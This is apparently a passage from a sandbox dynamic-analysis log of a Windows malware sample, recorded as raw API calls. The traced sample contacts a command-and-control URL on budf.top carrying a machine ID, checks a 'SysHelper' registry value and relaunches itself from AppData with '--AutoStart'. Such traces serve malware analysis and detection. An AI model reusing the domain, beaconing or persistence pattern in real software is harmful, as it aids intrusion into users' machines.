lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0104.815] lstrlenA (lpString="") returned 0 [0104.815] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2) returned 0x31e31f8 [0104.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3238010, cbMultiByte=-1, lpWideCharStr=0x31e31f8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.815] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0104.815] lstrlenA (lpString="") returned 0 [0104.815] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2) returned 0x31e3258 [0104.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3238278, cbMultiByte=-1, lpWideCharStr=0x31e3258, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.815] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0104.815] lstrlenA (lpString="") returned 0 [0104.815] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2) returned 0x31e3208 [0104.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32384e0, cbMultiByte=-1, lpWideCharStr=0x31e3208, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0104.815] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0104.815] lstrlenW (lpString="") returned 0 [0104.815] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x12) returned 0x6d6848 [0104.815] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x288) returned 0x32530f8 [0104.815] GetAdaptersInfo (in: AdapterInfo=0x32530f8, SizePointer=0x18e294 | out: AdapterInfo=0x32530f8, SizePointer=0x18e294) returned 0x0 [0104.820] GetAdaptersInfo (in: AdapterInfo=0x32530f8, SizePointer=0x18e294 | out: AdapterInfo=0x32530f8, SizePointer=0x18e294) returned 0x0 [0104.829] GetLastError () returned 0x0 [0104.835] GetLastError () returned 0x0 [0104.835] CryptAcquireContextW (in: phProv=0x18e264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18e264*=0x70e5b8) returned 1 [0104.870] CryptCreateHash (in: hProv=0x70e5b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18e26c | out: phHash=0x18e26c) returned 1 [0104.870] CryptHashData (hHash=0x6edbd8, pbData=0x323f7a8, dwDataLen=0x11, dwFlags=0x0) returned 1 [0104.870] CryptGetHashParam (in: hHash=0x6edbd8, dwParam=0x2, pbData=0x0, pdwDataLen=0x18e268, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18e268) returned 1 [0104.870] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x11) returned 0x6d6868 [0104.870] CryptGetHashParam (in: hHash=0x6edbd8, dwParam=0x2, pbData=0x6d6868, pdwDataLen=0x18e268, dwFlags=0x0 | out: pbData=0x6d6868, pdwDataLen=0x18e268) returned 1 [0104.870] GetLastError () returned 0x0 [0104.870] CryptDestroyHash (hHash=0x6edbd8) returned 1 [0104.870] CryptReleaseContext (hProv=0x70e5b8, dwFlags=0x0) returned 1 [0104.870] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x323f7a8 | out: hHeap=0x6b0000) returned 1 [0104.870] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x30) returned 0x3228868 [0104.870] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x718440 | out: hHeap=0x6b0000) returned 1 [0104.870] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6dc528 | out: hHeap=0x6b0000) returned 1 [0104.870] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0xb68) returned 0x5a8 [0105.167] WaitForSingleObject (hHandle=0x5a8, dwMilliseconds=0xffffffff) Thread: id = 109 os_tid = 0xb60 Thread: id = 110 os_tid = 0xb4c Thread: id = 111 os_tid = 0xb50 Thread: id = 112 os_tid = 0xb5c Thread: id = 113 os_tid = 0xb64 Thread: id = 114 os_tid = 0xbb4 Thread: id = 115 os_tid = 0xaac Thread: id = 116 os_tid = 0xb38 Thread: id = 117 os_tid = 0xb68 [0105.174] timeGetTime () returned 0x114f44e [0105.174] GetLastError () returned 0x54f [0105.174] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x3bc) returned 0x3253308 [0105.174] GetCurrentThreadId () returned 0xb68 [0105.174] SetLastError (dwErrCode=0x54f) [0105.174] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x98da5e4 | out: phkResult=0x98da5e4*=0x364) returned 0x0 [0105.174] RegQueryValueExW (in: hKey=0x364, lpValueName="SysHelper", lpReserved=0x0, lpType=0x98da5d8, lpData=0x98da5e0, lpcbData=0x98da5dc*=0x4 | out: lpType=0x98da5d8*=0x4, lpData=0x98da5e0*=0x1, lpcbData=0x98da5dc*=0x4) returned 0x0 [0105.174] RegCloseKey (hKey=0x364) returned 0x0 [0105.202] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x98da4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0105.202] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0105.203] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6d6868 [0105.203] AreFileApisANSI () returned 1 [0105.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98da4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0105.203] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x7a) returned 0x70e5b8 [0105.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x98da4e4, cbMultiByte=-1, lpWideCharStr=0x70e5b8, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0105.209] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x98da368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0105.238] GetLastError () returned 0x2 [0105.238] GetLastError () returned 0x2 [0105.238] SetLastError (dwErrCode=0x2) [0105.238] GetLastError () returned 0x2 [0105.238] SetLastError (dwErrCode=0x2) [0105.238] GetLastError () returned 0x2 [0105.238] SetLastError (dwErrCode=0x2) [0105.243] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70e5b8 | out: hHeap=0x6b0000) returned 1 [0105.244] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0105.244] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x60) returned 0x78f5a8 [0105.244] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x8e) returned 0x70e370 [0105.244] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x78f5a8 | out: hHeap=0x6b0000) returned 1 [0105.244] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x30) returned 0x718440 [0105.244] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x840) returned 0x32536d0 [0105.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x718440, cbMultiByte=-1, lpWideCharStr=0x32536d0, cchWideChar=1056 | out: lpWideCharStr="B56D42C81778FD36CA7BD76E3CC6490E") returned 33 [0105.244] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x850) returned 0x3278c58 [0105.244] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x32536d0 | out: hHeap=0x6b0000) returned 1 [0105.244] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x718440 | out: hHeap=0x6b0000) returned 1 [0105.244] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x8b0) returned 0x32536d0 [0105.244] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70e370 | out: hHeap=0x6b0000) returned 1 [0105.244] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x3278c58 | out: hHeap=0x6b0000) returned 1 [0105.244] lstrcpyW (in: lpString1=0x98daf78, lpString2="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E" [0105.244] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9236000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e33a" [0xc000000f], "LOCAL" [0x7] Thread: id = 122 os_tid = 0xad8 Thread: id = 123 os_tid = 0x324 Thread: id = 124 os_tid = 0x244 Thread: id = 125 os_tid = 0x548 Thread: id = 126 os_tid = 0x750 Thread: id = 127 os_tid = 0x6a0 Thread: id = 128 os_tid = 0x68c Thread: id = 129 os_tid = 0x680 Thread: id = 130 os_tid = 0x66c Thread: id = 131 os_tid = 0x614 Thread: id = 132 os_tid = 0x5fc Thread: id = 133 os_tid = 0x188 Thread: id = 134 os_tid = 0x140 Thread: id = 135 os_tid = 0x128 Thread: id = 136 os_tid = 0x2b0 Thread: id = 137 os_tid = 0x218 Thread: id = 138 os_tid = 0x1cc Thread: id = 173 os_tid = 0x9ac Thread: id = 174 os_tid = 0x9b8 Thread: id = 176 os_tid = 0x928 Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 142 os_tid = 0x638 Thread: id = 143 os_tid = 0x554 Thread: id = 144 os_tid = 0x720 Thread: id = 145 os_tid = 0x668 Thread: id = 146 os_tid = 0x65c Thread: id = 147 os_tid = 0x144 Thread: id = 148 os_tid = 0x110 Thread: id = 149 os_tid = 0x3f0 Thread: id = 150 os_tid = 0x3ec Thread: id = 151 os_tid = 0x3e4 Thread: id = 152 os_tid = 0x3e0 Thread: id = 153 os_tid = 0x3d0 Thread: id = 154 os_tid = 0x3cc Thread: id = 155 os_tid = 0x398 Thread: id = 156 os_tid = 0x394 Thread: id = 157 os_tid = 0x384 Thread: id = 158 os_tid = 0x380 Thread: id = 159 os_tid = 0x368 Thread: id = 160 os_tid = 0x350 Thread: id = 161 os_tid = 0x33c Thread: id = 171 os_tid = 0x87c Thread: id = 175 os_tid = 0xbfc Process: id = "11" image_name = "cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" page_root = "0x79e3d000" os_pid = "0x4d0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x37c" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --AutoStart" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e979" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 177 os_tid = 0x4d4 [0142.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x677a3320, dwHighDateTime=0x1d60a66)) [0142.837] GetCurrentProcessId () returned 0x4d0 [0142.837] GetCurrentThreadId () returned 0x4d4 [0142.837] GetTickCount () returned 0x112f73b [0142.837] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=6795736551) returned 1 [0147.110] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0147.110] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x870000 [0147.110] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74eb0000 [0147.110] GetProcAddress (hModule=0x74eb0000, lpProcName="FlsAlloc") returned 0x74ec4f2b [0147.110] GetProcAddress (hModule=0x74eb0000, lpProcName="FlsGetValue") returned 0x74ec1252 [0147.111] GetProcAddress (hModule=0x74eb0000, lpProcName="FlsSetValue") returned 0x74ec4208 [0147.111] GetProcAddress (hModule=0x74eb0000, lpProcName="FlsFree") returned 0x74ec359f [0147.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74eb0000 [0147.111] GetProcAddress (hModule=0x74eb0000, lpProcName="EncodePointer") returned 0x76f30fcb [0147.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74eb0000 [0147.111] GetProcAddress (hModule=0x74eb0000, lpProcName="EncodePointer") returned 0x76f30fcb [0147.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74eb0000 [0147.111] GetProcAddress (hModule=0x74eb0000, lpProcName="EncodePointer") returned 0x76f30fcb [0147.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74eb0000 [0147.111] GetProcAddress (hModule=0x74eb0000, lpProcName="EncodePointer") returned 0x76f30fcb [0147.112] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74eb0000 [0147.112] GetProcAddress (hModule=0x74eb0000, lpProcName="EncodePointer") returned 0x76f30fcb [0147.112] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74eb0000 [0147.112] GetProcAddress (hModule=0x74eb0000, lpProcName="EncodePointer") returned 0x76f30fcb [0147.112] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74eb0000 [0147.112] GetProcAddress (hModule=0x74eb0000, lpProcName="EncodePointer") returned 0x76f30fcb [0147.112] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74eb0000 [0147.112] GetProcAddress (hModule=0x74eb0000, lpProcName="DecodePointer") returned 0x76f29d35 [0147.113] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x214) returned 0x8707d0 [0147.113] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74eb0000 [0147.113] GetProcAddress (hModule=0x74eb0000, lpProcName="DecodePointer") returned 0x76f29d35 [0147.113] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74eb0000 [0147.113] GetProcAddress (hModule=0x74eb0000, lpProcName="EncodePointer") returned 0x76f30fcb [0147.113] GetProcAddress (hModule=0x74eb0000, lpProcName="DecodePointer") returned 0x76f29d35 [0147.113] GetCurrentThreadId () returned 0x4d4 [0147.113] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0147.113] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x800) returned 0x8709f0 [0147.113] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0147.113] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0147.113] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0147.114] SetHandleCount (uNumber=0x20) returned 0x20 [0147.114] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --AutoStart" [0147.114] GetEnvironmentStringsW () returned 0x2d0798* [0147.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1409 [0147.114] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x581) returned 0x8711f8 [0147.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x8711f8, cbMultiByte=1409, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1409 [0147.114] FreeEnvironmentStringsW (penv=0x2d0798) returned 1 [0147.114] GetLastError () returned 0x0 [0147.114] SetLastError (dwErrCode=0x0) [0147.114] GetLastError () returned 0x0 [0147.114] SetLastError (dwErrCode=0x0) [0147.114] GetLastError () returned 0x0 [0147.114] SetLastError (dwErrCode=0x0) [0147.114] GetACP () returned 0x4e4 [0147.114] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x220) returned 0x871788 [0147.114] GetLastError () returned 0x0 [0147.114] SetLastError (dwErrCode=0x0) [0147.114] IsValidCodePage (CodePage=0x4e4) returned 1 [0147.114] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0147.114] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0147.114] GetLastError () returned 0x0 [0147.115] SetLastError (dwErrCode=0x0) [0147.115] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0147.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0147.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0147.115] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0147.115] GetLastError () returned 0x0 [0147.115] SetLastError (dwErrCode=0x0) [0147.115] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0147.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0147.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ볞ᷕ駾@Ā") returned 256 [0147.115] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ볞ᷕ駾@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0147.115] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ볞ᷕ駾@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" 